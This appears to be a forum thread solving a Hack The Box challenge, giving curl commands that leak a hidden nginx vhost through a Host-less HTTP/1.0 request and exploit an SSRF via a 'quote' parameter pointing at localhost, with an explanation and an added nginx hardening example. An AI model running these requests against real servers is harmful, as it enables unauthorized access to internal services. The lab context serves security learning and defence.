HTB - Dusty Alleys
by x1rx - Saturday March 29, 2025 at 09:17 AM
#1
Let's solve together
#2
Vuln https://security.snyk.io/vuln/SNYK-JS-NODEFETCH-2342118
#3
1 - nginx HTTP/1.0 information leak
2 - SSRF
#4
What is the parameter to use?
#5
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'
#6
(Mar 30, 2025, 01:49 PM)ent0xE Wrote:
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'

I don't understand the downgrading to expose the vhost, can you explain?

(Mar 30, 2025, 03:28 PM)pop10189 Wrote:
(Mar 30, 2025, 01:49 PM)ent0xE Wrote:
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'

I don't understand the downgrading to expose the vhost, can you explain?

Ohh nvm, now I understand. In HTTP/1.0, the Host header is optional. If the client does not send it, nginx does not know which vhost to serve and will default to the first defined server block, which is: server_name alley.$SECRET_ALLEY
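To make the behaviour pop10189 describes concrete, here is an added nginx configuration example (not the challenge's real config and not posted by anyone in the thread) showing the layout that leaks the first server_name to a Host-less HTTP/1.0 request, next to a hardened layout. The port 1337, the vhost names alley.example and guardian.example, the document roots and the upstream address are all assumptions chosen for illustration.

```nginx
# ADDED EXAMPLE - not the challenge's nginx.conf. Names, ports and paths are assumed.

# --- Weak layout -----------------------------------------------------------
# For each listen socket, the first server{} block is the implicit
# default_server. HTTP/1.1 requires Host, so nginx answers a Host-less
# HTTP/1.1 request with 400; under HTTP/1.0 the header is optional, so a
# request with no Host (curl --http1.0 -H 'Host:') is simply routed to this
# block. Whatever it serves reaches a client that never named the vhost,
# and redirects nginx builds for it fall back to the primary server_name
# when no Host was sent, so the "secret" name ends up on the wire.
server {
    listen 1337;
    server_name alley.example;           # assumed stand-in for alley.$SECRET_ALLEY
    location / { root /srv/alley; }      # assumed document root
}

server {
    listen 1337;
    server_name guardian.example;        # assumed stand-in for the guardian vhost
    location /guardian { proxy_pass http://127.0.0.1:3000; }   # assumed upstream
}

# --- Hardened layout -------------------------------------------------------
# Declare an explicit catch-all with default_server and a non-matching
# server_name. "return 444" closes the connection without sending a response,
# so an unknown Host, an empty Host, or a Host-less HTTP/1.0 request yields
# nothing to enumerate; only a client that already knows a vhost name gets
# routed to it.
server {
    listen 1337 default_server;
    server_name _;
    return 444;
}

server {
    listen 1337;
    server_name alley.example;           # assumed; now only reachable by name
    location / { root /srv/alley; }
}

server {
    listen 1337;
    server_name guardian.example;        # assumed
    location /guardian { proxy_pass http://127.0.0.1:3000; }
}
```

With the hardened layout, the probe from post #5 (curl --http1.0 -H 'Host:' http://$IP:1337/think) gets an empty reply instead of the first vhost's content, while curl -H 'Host: guardian.example' http://$IP:1337/guardian still reaches the guardian block. Note that the catch-all must carry the default_server flag on every listen socket you expose; declaring it first in the file is not enough once includes or other config files reorder the blocks.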